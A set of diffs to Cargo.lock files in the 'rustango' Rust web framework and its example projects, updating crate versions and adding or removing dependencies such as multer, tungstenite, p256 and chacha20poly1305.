+checksum = "879f10e63c20629ecabbb64a8010319738c66a5cd0c29b02d63d272b03751d01"
+dependencies = [
+ "generic-array",
+]
+
+[[package]]
 name = "inventory"
 version = "0.3.24"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -1064,7 +1151,6 @@ version = "0.30.1"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "2e99fb7a497b1e3339bc746195567ed8d3e24945ecd636e3619d20b9de9e9149"
 dependencies = [
- "cc",
  "pkg-config",
  "vcpkg",
 ]
@@ -1155,6 +1241,23 @@ dependencies = [
 ]
 
 [[package]]
+name = "multer"
+version = "3.1.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "83e87776546dc87511aa5ee218730c92b666d7264ab6ed41f9d215af9cd5224b"
+dependencies = [
+ "bytes",
+ "encoding_rs",
+ "futures-util",
+ "http",
+ "httparse",
+ "memchr",
+ "mime",
+ "spin",
+ "version_check",
+]
+
+[[package]]
 name = "num-bigint-dig"
 version = "0.8.6"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -1210,6 +1313,12 @@ name = "once_cell"
 version = "1.21.4"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "9f7c3e4beb33f85d45ae3e3a1792185706c8e16d043238c593331cc7cd313b50"
+
+[[package]]
+name = "opaque-debug"
+version = "0.3.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "c08d65885ee38876c4f86fa503fb49d7b507c2b62552df7c70b2fce627e06381"
 
 [[package]]
 name = "parking"
@@ -1346,6 +1455,17 @@ name = "plain"
 version = "0.2.3"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "b4596b6d070b27117e987119b4dac604f3c58cfb0b191112e24771b2faeac1a6"
+
+[[package]]
+name = "poly1305"
+version = "0.8.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "8159bd90725d2df49889a078b54f4f79e87f1f8a8444194cdca81d38f5393abf"
+dependencies = [
+ "cpufeatures 0.2.17",
+ "opaque-debug",
+ "universal-hash",
+]
 
 [[package]]
 name = "potential_utf"
@@ -1493,7 +1613,7 @@ version = "0.10.2"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "c7f5fa3a058cd35567ef9bfa5e75732bee0f9e4c55fa90477bef2dfcdbc4be80"
 dependencies = [
- "chacha20",
+ "chacha20 0.10.2",
  "getrandom 0.4.3",
  "rand_core 0.10.1",
 ]
@@ -1716,6 +1836,7 @@ dependencies = [
  "async-trait",
  "axum",
  "base64",
+ "chacha20poly1305",
  "chrono",
  "cookie",
  "flate2",
@@ -1733,6 +1854,7 @@ dependencies = [
  "serde",
  "serde_json",
  "serde_urlencoded",
+ "sha1",
  "sha2",
  "sqlx",
  "subtle",
@@ -1745,6 +1867,7 @@ dependencies = [
  "tracing",
  "tracing-appender",
  "tracing-subscriber",
+ "urlencoding",
  "uuid",
 ]
 
@@ -1757,21 +1880,6 @@ dependencies = [
  "quote",
  "serde_json",
  "syn 2.0.119",
-]
-
-[[package]]
-name = "rustango-showcase"
-version = "0.0.0"
-dependencies = [
- "axum",
- "chrono",
- "dotenvy",
- "rustango",
- "serde",
- "serde_json",
- "sqlx",
- "tokio",
- "tracing",
 ]
 
 [[package]]
@@ -2464,6 +2572,18 @@ dependencies = [
 ]
 
 [[package]]
+name = "tokio-tungstenite"
+version = "0.29.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "8f72a05e828585856dacd553fba484c242c46e391fb0e58917c942ee9202915c"
+dependencies = [
+ "futures-util",
+ "log",
+ "tokio",
+ "tungstenite",
+]
+
+[[package]]
 name = "toml"
 version = "0.8.23"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -2653,6 +2773,22 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "e421abadd41a4225275504ea4d6566923418b7f05506fbc9c0fe86ba7396114b"
 
 [[package]]
+name = "tungstenite"
+version = "0.29.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "6c01152af293afb9c7c2a57e4b559c5620b421f6d133261c60dd2d0cdb38e6b8"
+dependencies = [
+ "bytes",
+ "data-encoding",
+ "http",
+ "httparse",
+ "log",
+ "rand 0.9.5",
+ "sha1",
+ "thiserror 2.0.20",
+]
+
+[[package]]
 name = "typenum"
 version = "1.20.1"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -2698,6 +2834,16 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "c6f5d3c3b1bf09027a88a6bc961fc00497d651009560b5463668dc81b0fa87a8"
 
 [[package]]
+name = "universal-hash"
+version = "0.5.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "fc1de2c688dc15305988b563c3854064043356019f97a4b46276fe734c4f07ea"
+dependencies = [
+ "crypto-common",
+ "subtle",
+]
+
+[[package]]
 name = "untrusted"
 version = "0.9.0"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -2714,6 +2860,12 @@ dependencies = [
  "percent-encoding",
  "serde",
 ]
+
+[[package]]
+name = "urlencoding"
+version = "2.1.3"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "daf8dba3b7eb870caf1ddeed7bc9d2a049f3cfdfae7cb521b087cc33ae4c49da"
 
 [[package]]
 name = "utf8_iter"

--- a/crates/rustango/examples/admin_demo/Cargo.lock
+++ b/crates/rustango/examples/admin_demo/Cargo.lock
@@ -889,7 +889,7 @@ dependencies = [
  "tokio",
  "tokio-rustls",
  "tower-service",
- "webpki-roots",
+ "webpki-roots 1.0.9",
 ]
 
 [[package]]
@@ -1753,7 +1753,7 @@ dependencies = [
  "wasm-bindgen",
  "wasm-bindgen-futures",
  "web-sys",
- "webpki-roots",
+ "webpki-roots 1.0.9",
 ]
 
 [[package]]
@@ -1830,7 +1830,7 @@ dependencies = [
 
 [[package]]
 name = "rustango"
-version = "0.55.0"
+version = "0.56.0"
 dependencies = [
  "argon2",
  "async-trait",
@@ -1873,7 +1873,7 @@ dependencies = [
 
 [[package]]
 name = "rustango-macros"
-version = "0.55.0"
+version = "0.56.0"
 dependencies = [
  "proc-macro-crate",
  "proc-macro2",
@@ -2170,6 +2170,7 @@ dependencies = [
  "once_cell",
  "percent-encoding",
  "rust_decimal",
+ "rustls",
  "serde",
  "serde_json",
  "sha2",
@@ -2180,6 +2181,7 @@ dependencies = [
  "tracing",
  "url",
  "uuid",
+ "webpki-roots 0.26.11",
 ]
 
 [[package]]
@@ -3017,6 +3019,15 @@ checksum = "5a6580f308b1fad9207618087a65c04e7a10bc77e02c8e84e9b00dd4b12fa0bb"
 dependencies = [
  "js-sys",
  "wasm-bindgen",
+]
+
+[[package]]
+name = "webpki-roots"
+version = "0.26.11"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "521bc38abb08001b01866da9f51eb7c5d647a19260e00054a8c7fd5f9e57f7a9"
+dependencies = [
+ "webpki-roots 1.0.9",
 ]
 
 [[package]]

--- a/crates/rustango/examples/auth_demo/Cargo.lock
+++ b/crates/rustango/examples/auth_demo/Cargo.lock
@@ -926,7 +926,7 @@ dependencies = [
  "tokio",
  "tokio-rustls",
  "tower-service",
- "webpki-roots",
+ "webpki-roots 1.0.9",
 ]
 
 [[package]]
@@ -1776,7 +1776,7 @@ dependencies = [
  "wasm-bindgen",
  "wasm-bindgen-futures",
  "web-sys",
- "webpki-roots",
+ "webpki-roots 1.0.9",
 ]
 
 [[package]]
@@ -1863,7 +1863,7 @@ dependencies = [
 
 [[package]]
 name = "rustango"
-version = "0.55.0"
+version = "0.56.0"
 dependencies = [
  "argon2",
  "async-trait",
@@ -1906,7 +1906,7 @@ dependencies = [
 
 [[package]]
 name = "rustango-macros"
-version = "0.55.0"
+version = "0.56.0"
 dependencies = [
  "proc-macro-crate",
  "proc-macro2",
@@ -2211,6 +2211,7 @@ dependencies = [
  "once_cell",
  "percent-encoding",
  "rust_decimal",
+ "rustls",
  "serde",
  "serde_json",
  "sha2",
@@ -2221,6 +2222,7 @@ dependencies = [
  "tracing",
  "url",
  "uuid",
+ "webpki-roots 0.26.11",
 ]
 
 [[package]]
@@ -3020,6 +3022,15 @@ checksum = "5a6580f308b1fad9207618087a65c04e7a10bc77e02c8e84e9b00dd4b12fa0bb"
 dependencies = [
  "js-sys",
  "wasm-bindgen",
+]
+
+[[package]]
+name = "webpki-roots"
+version = "0.26.11"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "521bc38abb08001b01866da9f51eb7c5d647a19260e00054a8c7fd5f9e57f7a9"
+dependencies = [
+ "webpki-roots 1.0.9",
 ]
 
 [[package]]

--- a/crates/rustango/examples/auth_demo/Cargo.lock
+++ b/crates/rustango/examples/auth_demo/Cargo.lock
@@ -3,12 +3,6 @@
 version = 4
 
 [[package]]
-name = "adler2"
-version = "2.0.1"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "320119579fcad9c21884f5c4861d16174d0e06250625266f50fe6898340abefa"
-
-[[package]]
 name = "aho-corasick"
 version = "1.1.5"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -77,6 +71,20 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "1505bd5d3d116872e7271a6d4e16d81d0c8570876c8de68093a09ac269d8aac0"
 
 [[package]]
+name = "auth_demo"
+version = "0.1.0"
+dependencies = [
+ "axum",
+ "chrono",
+ "dotenvy",
+ "rustango",
+ "serde",
+ "serde_json",
+ "tokio",
+ "tower",
+]
+
+[[package]]
 name = "autocfg"
 version = "1.5.1"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -101,6 +109,7 @@ dependencies = [
  "matchit",
  "memchr",
  "mime",
+ "multer",
  "percent-encoding",
  "pin-project-lite",
  "serde_core",
@@ -131,6 +140,12 @@ dependencies = [
  "tower-layer",
  "tower-service",
 ]
+
+[[package]]
+name = "base16ct"
+version = "0.2.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "4c7f02d4ea65f2c1853089ffd8d2787bdbc63de2f0d29dedbcf8ccdfa0ccd4cf"
 
 [[package]]
 name = "base64"
@@ -269,6 +284,33 @@ dependencies = [
 ]
 
 [[package]]
+name = "ciborium"
+version = "0.2.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "42e69ffd6f0917f5c029256a24d0161db17cea3997d185db0d35926308770f0e"
+dependencies = [
+ "ciborium-io",
+ "ciborium-ll",
+ "serde",
+]
+
+[[package]]
+name = "ciborium-io"
+version = "0.2.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "05afea1e0a06c9be33d539b876f1ce3692f4afea2cb41f740e7743225ed1c757"
+
+[[package]]
+name = "ciborium-ll"
+version = "0.2.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "57663b653d948a338bfb3eeba9bb2fd5fcfaecb9e199e87e1eda4d9e8b240fd9"
+dependencies = [
+ "ciborium-io",
+ "half",
+]
+
+[[package]]
 name = "const-oid"
 version = "0.9.6"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -324,15 +366,6 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "217698eaf96b4a3f0bc4f3662aaa55bdf913cd54d7204591faa790070c6d0853"
 
 [[package]]
-name = "crc32fast"
-version = "1.5.1"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "8498c871161e1742aaa9d52551b2d6ebdd4c3d45a3be423e3728f33b955be550"
-dependencies = [
- "cfg-if",
-]
-
-[[package]]
 name = "crossbeam-channel"
 version = "0.5.16"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -376,10 +409,28 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "61803da095bee82a81bb1a452ecc25d3b2f1416d1897eb86430c6159ef717c17"
 
 [[package]]
-name = "crypto-common"
-version = "0.1.7"
+name = "crunchy"
+version = "0.2.4"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "78c8292055d1c1df0cce5d180393dc8cce0abec0a7102adb6c7b1eef6016d60a"
+checksum = "460fbee9c2c2f33933d720630a6a0bac33ba7053db5344fac858d4b8952d77d5"
+
+[[package]]
+name = "crypto-bigint"
+version = "0.5.5"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "0dc92fb57ca44df6db8059111ab3af99a63d5d0f8375d9972e319a379c6bab76"
+dependencies = [
+ "generic-array",
+ "rand_core 0.6.4",
+ "subtle",
+ "zeroize",
+]
+
+[[package]]
+name = "crypto-common"
+version = "0.1.6"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "1bfb12502f3fc46cca1bb51ac28df9d618d813cdc3d2f25b9fe775a34af26bb3"
 dependencies = [
  "generic-array",
  "typenum",
@@ -435,12 +486,54 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "1aaf95b3e5c8f23aa320147307562d361db0ae0d51242340f558153b4eb2439b"
 
 [[package]]
+name = "ecdsa"
+version = "0.16.9"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "ee27f32b5c5292967d2d4a9d7f1e0b0aed2c15daded5a60300e4abb9d8020bca"
+dependencies = [
+ "der",
+ "digest",
+ "elliptic-curve",
+ "rfc6979",
+ "signature",
+ "spki",
+]
+
+[[package]]
 name = "either"
 version = "1.18.0"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "252afb9ae5eaa683babdc6a068b3f5726eb19e05070c731f9b2a23a7c3e8ed34"
 dependencies = [
  "serde",
+]
+
+[[package]]
+name = "elliptic-curve"
+version = "0.13.8"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "b5e6043086bf7973472e0c7dff2142ea0b680d30e18d9cc40f267efbf222bd47"
+dependencies = [
+ "base16ct",
+ "crypto-bigint",
+ "digest",
+ "ff",
+ "generic-array",
+ "group",
+ "pkcs8",
+ "rand_core 0.6.4",
+ "sec1",
+ "subtle",
+ "zeroize",
+]
+
+[[package]]
+name = "encoding_rs"
+version = "0.8.35"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "75030f3c4f45dafd7586dd6780965a8c7e8e285a5ecb86713e63a79c5b2766f3"
+dependencies = [
+ "cfg-if",
 ]
 
 [[package]]
@@ -481,21 +574,20 @@ dependencies = [
 ]
 
 [[package]]
+name = "ff"
+version = "0.13.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "c0b50bfb653653f9ca9095b427bed08ab8d75a137839d9ad64eb11810d5b6393"
+dependencies = [
+ "rand_core 0.6.4",
+ "subtle",
+]
+
+[[package]]
 name = "find-msvc-tools"
 version = "0.1.11"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "d45db016d36b838f563236e9193d0ee6ce38f3f68b6c94e914b4929c96bbb890"
-
-[[package]]
-name = "flate2"
-version = "1.1.10"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "6e634e2e0ebac1ee034020da1ca582e17ffe4e0f5e985823721e168928136dcb"
-dependencies = [
- "crc32fast",
- "miniz_oxide",
- "zlib-rs",
-]
 
 [[package]]
 name = "flume"
@@ -596,12 +688,13 @@ dependencies = [
 
 [[package]]
 name = "generic-array"
-version = "0.14.7"
+version = "0.14.9"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "85649ca51fd72272d7821adaf274ad91c288277713d9c18820d8499a7ff69e9a"
+checksum = "4bb6743198531e02858aeaea5398fcc883e71851fcbcb5a2f773e2fb6cb1edf2"
 dependencies = [
  "typenum",
  "version_check",
+ "zeroize",
 ]
 
 [[package]]
@@ -665,6 +758,28 @@ dependencies = [
  "bitflags",
  "ignore",
  "walkdir",
+]
+
+[[package]]
+name = "group"
+version = "0.13.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "f0f9ef7462f7c099f518d754361858f86d8a07af53ba9af0fe635bbccb151a63"
+dependencies = [
+ "ff",
+ "rand_core 0.6.4",
+ "subtle",
+]
+
+[[package]]
+name = "half"
+version = "2.7.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "6ea2d84b969582b4b1864a92dc5d27cd2b77b622a8d79306834f1be5ba20d84b"
+dependencies = [
+ "cfg-if",
+ "crunchy",
+ "zerocopy",
 ]
 
 [[package]]
@@ -1134,16 +1249,6 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "6877bb514081ee2a7ff5ef9de3281f14a4dd4bceac4c09388074a6b5df8a139a"
 
 [[package]]
-name = "miniz_oxide"
-version = "0.9.1"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "b63fbc4a50860e98e7b2aa7804ded1db5cbc3aff9193adaff57a6931bf7c4b4c"
-dependencies = [
- "adler2",
- "simd-adler32",
-]
-
-[[package]]
 name = "mio"
 version = "1.2.3"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -1152,6 +1257,23 @@ dependencies = [
  "libc",
  "wasi",
  "windows-sys 0.61.2",
+]
+
+[[package]]
+name = "multer"
+version = "3.1.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "83e87776546dc87511aa5ee218730c92b666d7264ab6ed41f9d215af9cd5224b"
+dependencies = [
+ "bytes",
+ "encoding_rs",
+ "futures-util",
+ "http",
+ "httparse",
+ "memchr",
+ "mime",
+ "spin",
+ "version_check",
 ]
 
 [[package]]
@@ -1210,6 +1332,18 @@ name = "once_cell"
 version = "1.21.4"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "9f7c3e4beb33f85d45ae3e3a1792185706c8e16d043238c593331cc7cd313b50"
+
+[[package]]
+name = "p256"
+version = "0.13.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "c9863ad85fa8f4460f9c48cb909d38a0d689dba1f6f6988a5e3e0d31071bcd4b"
+dependencies = [
+ "ecdsa",
+ "elliptic-curve",
+ "primeorder",
+ "sha2",
+]
 
 [[package]]
 name = "parking"
@@ -1369,6 +1503,15 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "85eae3c4ed2f50dcfe72643da4befc30deadb458a9b590d720cde2f2b1e97da9"
 dependencies = [
  "zerocopy",
+]
+
+[[package]]
+name = "primeorder"
+version = "0.13.6"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "353e1ca18966c16d9deb1c69278edbc5f194139612772bd9537af60ac231e1e6"
+dependencies = [
+ "elliptic-curve",
 ]
 
 [[package]]
@@ -1637,6 +1780,16 @@ dependencies = [
 ]
 
 [[package]]
+name = "rfc6979"
+version = "0.4.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "f8dd2a808d456c4a54e300a23e9f5a67e122c3024119acbfd73e3bf664491cb2"
+dependencies = [
+ "hmac",
+ "subtle",
+]
+
+[[package]]
 name = "ring"
 version = "0.17.14"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -1717,13 +1870,14 @@ dependencies = [
  "axum",
  "base64",
  "chrono",
+ "ciborium",
  "cookie",
- "flate2",
  "hmac",
  "http",
  "http-body-util",
  "indexmap",
  "inventory",
+ "p256",
  "password-hash",
  "rand 0.8.8",
  "reqwest",
@@ -1733,6 +1887,7 @@ dependencies = [
  "serde",
  "serde_json",
  "serde_urlencoded",
+ "sha1",
  "sha2",
  "sqlx",
  "subtle",
@@ -1745,6 +1900,7 @@ dependencies = [
  "tracing",
  "tracing-appender",
  "tracing-subscriber",
+ "urlencoding",
  "uuid",
 ]
 
@@ -1757,21 +1913,6 @@ dependencies = [
  "quote",
  "serde_json",
  "syn 2.0.119",
-]
-
-[[package]]
-name = "rustango-showcase"
-version = "0.0.0"
-dependencies = [
- "axum",
- "chrono",
- "dotenvy",
- "rustango",
- "serde",
- "serde_json",
- "sqlx",
- "tokio",
- "tracing",
 ]
 
 [[package]]
@@ -1841,6 +1982,20 @@ name = "scopeguard"
 version = "1.2.0"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "94143f37725109f92c262ed2cf5e59bce7498c01bcc1502d7b9afe439a4e9f49"
+
+[[package]]
+name = "sec1"
+version = "0.7.3"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "d3e97a565f76233a6003f9f5c54be1d9c5bdfa3eccfb189469f11ec4901c47dc"
+dependencies = [
+ "base16ct",
+ "der",
+ "generic-array",
+ "pkcs8",
+ "subtle",
+ "zeroize",
+]
 
 [[package]]
 name = "serde"
@@ -1973,12 +2128,6 @@ dependencies = [
  "digest",
  "rand_core 0.6.4",
 ]
-
-[[package]]
-name = "simd-adler32"
-version = "0.3.10"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "3a219298ac11a56ea9a6d2120044824d6f01aeb034955e7af7bc16858527deea"
 
 [[package]]
 name = "slab"
@@ -2716,6 +2865,12 @@ dependencies = [
 ]
 
 [[package]]
+name = "urlencoding"
+version = "2.1.3"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "daf8dba3b7eb870caf1ddeed7bc9d2a049f3cfdfae7cb521b087cc33ae4c49da"
+
+[[package]]
 name = "utf8_iter"
 version = "1.0.4"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -3234,12 +3389,6 @@ dependencies = [
  "quote",
  "syn 3.0.4",
 ]
-
-[[package]]
-name = "zlib-rs"
-version = "0.6.7"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "34b31d188d9d685a4f9c7b46d6e36631b07058d2cfe190267adce54dc230bf12"
 
 [[package]]
 name = "zmij"

--- a/crates/rustango/examples/auth_demo/Cargo.lock
+++ b/crates/rustango/examples/auth_demo/Cargo.lock
@@ -2551,9 +2551,9 @@ dependencies = [
 
 [[package]]
 name = "tinyvec"
-version = "1.12.0"
+version = "1.13.1"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "bb4ebadaa0af04fab11ae01eb5f9fdb5f9c5b875506e210e71c07873528baa7f"
+checksum = "22e6cd18156ba6530d7deea039a6c1a6ec4f173dd330a9a53a4ea569fe85abac"
 dependencies = [
  "tinyvec_macros",
 ]

--- a/crates/rustango/examples/cookbook_blog/Cargo.lock
+++ b/crates/rustango/examples/cookbook_blog/Cargo.lock
@@ -2528,9 +2528,9 @@ dependencies = [
 
 [[package]]
 name = "tinyvec"
-version = "1.12.0"
+version = "1.13.1"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "bb4ebadaa0af04fab11ae01eb5f9fdb5f9c5b875506e210e71c07873528baa7f"
+checksum = "22e6cd18156ba6530d7deea039a6c1a6ec4f173dd330a9a53a4ea569fe85abac"
 dependencies = [
  "tinyvec_macros",
 ]

--- a/crates/rustango/examples/cookbook_blog/Cargo.lock
+++ b/crates/rustango/examples/cookbook_blog/Cargo.lock
@@ -89,6 +89,7 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "31b698c5f9a010f6573133b09e0de5408834d0c82f8d7475a89fc1867a71cd90"
 dependencies = [
  "axum-core",
+ "base64",
  "bytes",
  "form_urlencoded",
  "futures-util",
@@ -101,14 +102,17 @@ dependencies = [
  "matchit",
  "memchr",
  "mime",
+ "multer",
  "percent-encoding",
  "pin-project-lite",
  "serde_core",
  "serde_json",
  "serde_path_to_error",
  "serde_urlencoded",
+ "sha1",
  "sync_wrapper",
  "tokio",
+ "tokio-tungstenite",
  "tower",
  "tower-layer",
  "tower-service",
@@ -275,13 +279,55 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "c2459377285ad874054d797f3ccebf984978aa39129f6eafde5cdc8315b612f8"
 
 [[package]]
+name = "cookbook_blog"
+version = "0.1.0"
+dependencies = [
+ "axum",
+ "base64",
+ "chrono",
+ "dotenvy",
+ "futures",
+ "http",
+ "http-body-util",
+ "reqwest",
+ "rustango",
+ "serde",
+ "serde_json",
+ "sqlx",
+ "tera",
+ "tokio",
+ "tower",
+ "tracing",
+ "uuid",
+]
+
+[[package]]
 name = "cookie"
 version = "0.18.2"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "1a373e3602691c3cdea496d2f0ee5935151e6168fe87739483c463db1b2f2f87"
 dependencies = [
+ "percent-encoding",
  "time",
  "version_check",
+]
+
+[[package]]
+name = "cookie_store"
+version = "0.22.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "15b2c103cf610ec6cae3da84a766285b42fd16aad564758459e6ecf128c75206"
+dependencies = [
+ "cookie",
+ "document-features",
+ "idna",
+ "log",
+ "publicsuffix",
+ "serde",
+ "serde_derive",
+ "serde_json",
+ "time",
+ "url",
 ]
 
 [[package]]
@@ -386,6 +432,12 @@ dependencies = [
 ]
 
 [[package]]
+name = "data-encoding"
+version = "2.11.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "4583a4551df46e2792f82ceeac45e850d2e2d5debba0b91f102385cda5b11f06"
+
+[[package]]
 name = "der"
 version = "0.7.10"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -429,6 +481,15 @@ dependencies = [
 ]
 
 [[package]]
+name = "document-features"
+version = "0.2.12"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "d4b8a88685455ed29a21542a33abd9cb6510b6b129abadabdcef0f4c55bc8f61"
+dependencies = [
+ "litrs",
+]
+
+[[package]]
 name = "dotenvy"
 version = "0.15.7"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -441,6 +502,15 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "252afb9ae5eaa683babdc6a068b3f5726eb19e05070c731f9b2a23a7c3e8ed34"
 dependencies = [
  "serde",
+]
+
+[[package]]
+name = "encoding_rs"
+version = "0.8.35"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "75030f3c4f45dafd7586dd6780965a8c7e8e285a5ecb86713e63a79c5b2766f3"
+dependencies = [
+ "cfg-if",
 ]
 
 [[package]]
@@ -524,6 +594,21 @@ dependencies = [
 ]
 
 [[package]]
+name = "futures"
+version = "0.3.34"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "9a31d2a3fbaaeb2af2368bbdd904aa8e812d3c04a1ee10d3171f52d556e5d0a3"
+dependencies = [
+ "futures-channel",
+ "futures-core",
+ "futures-executor",
+ "futures-io",
+ "futures-sink",
+ "futures-task",
+ "futures-util",
+]
+
+[[package]]
 name = "futures-channel"
 version = "0.3.34"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -568,6 +653,17 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "53c0fa8157de1303bfffdaa1cc2a673bfffb60102f76b0ef4441659124373fed"
 
 [[package]]
+name = "futures-macro"
+version = "0.3.34"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "9fb9654ba8355388abeb8dcb4fc62f511300867002afc858860463bdd9fe0c44"
+dependencies = [
+ "proc-macro2",
+ "quote",
+ "syn 3.0.4",
+]
+
+[[package]]
 name = "futures-sink"
 version = "0.3.34"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -585,8 +681,10 @@ version = "0.3.34"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "0d50a92467f8ba5dd6e3ee5d4bd04d73ab2e4e1c44474a0674821dfce14b79bc"
 dependencies = [
+ "futures-channel",
  "futures-core",
  "futures-io",
+ "futures-macro",
  "futures-sink",
  "futures-task",
  "memchr",
@@ -1076,6 +1174,12 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "47d9d19d1d6efa0109d2f65ff4c85cddd50bd572e5a00127ab10987290bcefae"
 
 [[package]]
+name = "litrs"
+version = "1.0.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "11d3d7f243d5c5a8b9bb5d6dd2b1602c0cb0b9db1621bafc7ed66e35ff9fe092"
+
+[[package]]
 name = "lock_api"
 version = "0.4.14"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -1152,6 +1256,23 @@ dependencies = [
  "libc",
  "wasi",
  "windows-sys 0.61.2",
+]
+
+[[package]]
+name = "multer"
+version = "3.1.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "83e87776546dc87511aa5ee218730c92b666d7264ab6ed41f9d215af9cd5224b"
+dependencies = [
+ "bytes",
+ "encoding_rs",
+ "futures-util",
+ "http",
+ "httparse",
+ "memchr",
+ "mime",
+ "spin",
+ "version_check",
 ]
 
 [[package]]
@@ -1390,6 +1511,22 @@ dependencies = [
 ]
 
 [[package]]
+name = "psl-types"
+version = "2.0.11"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "33cb294fe86a74cbcf50d4445b37da762029549ebeea341421c7c70370f86cac"
+
+[[package]]
+name = "publicsuffix"
+version = "2.3.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "6f42ea446cab60335f76979ec15e12619a2165b5ae2c12166bef27d283a9fadf"
+dependencies = [
+ "idna",
+ "psl-types",
+]
+
+[[package]]
 name = "quinn"
 version = "0.11.11"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -1606,6 +1743,8 @@ checksum = "eddd3ca559203180a307f12d114c268abf583f59b03cb906fd0b3ff8646c1147"
 dependencies = [
  "base64",
  "bytes",
+ "cookie",
+ "cookie_store",
  "futures-core",
  "http",
  "http-body",
@@ -1733,6 +1872,7 @@ dependencies = [
  "serde",
  "serde_json",
  "serde_urlencoded",
+ "sha1",
  "sha2",
  "sqlx",
  "subtle",
@@ -1745,6 +1885,7 @@ dependencies = [
  "tracing",
  "tracing-appender",
  "tracing-subscriber",
+ "urlencoding",
  "uuid",
 ]
 
@@ -1757,21 +1898,6 @@ dependencies = [
  "quote",
  "serde_json",
  "syn 2.0.119",
-]
-
-[[package]]
-name = "rustango-showcase"
-version = "0.0.0"
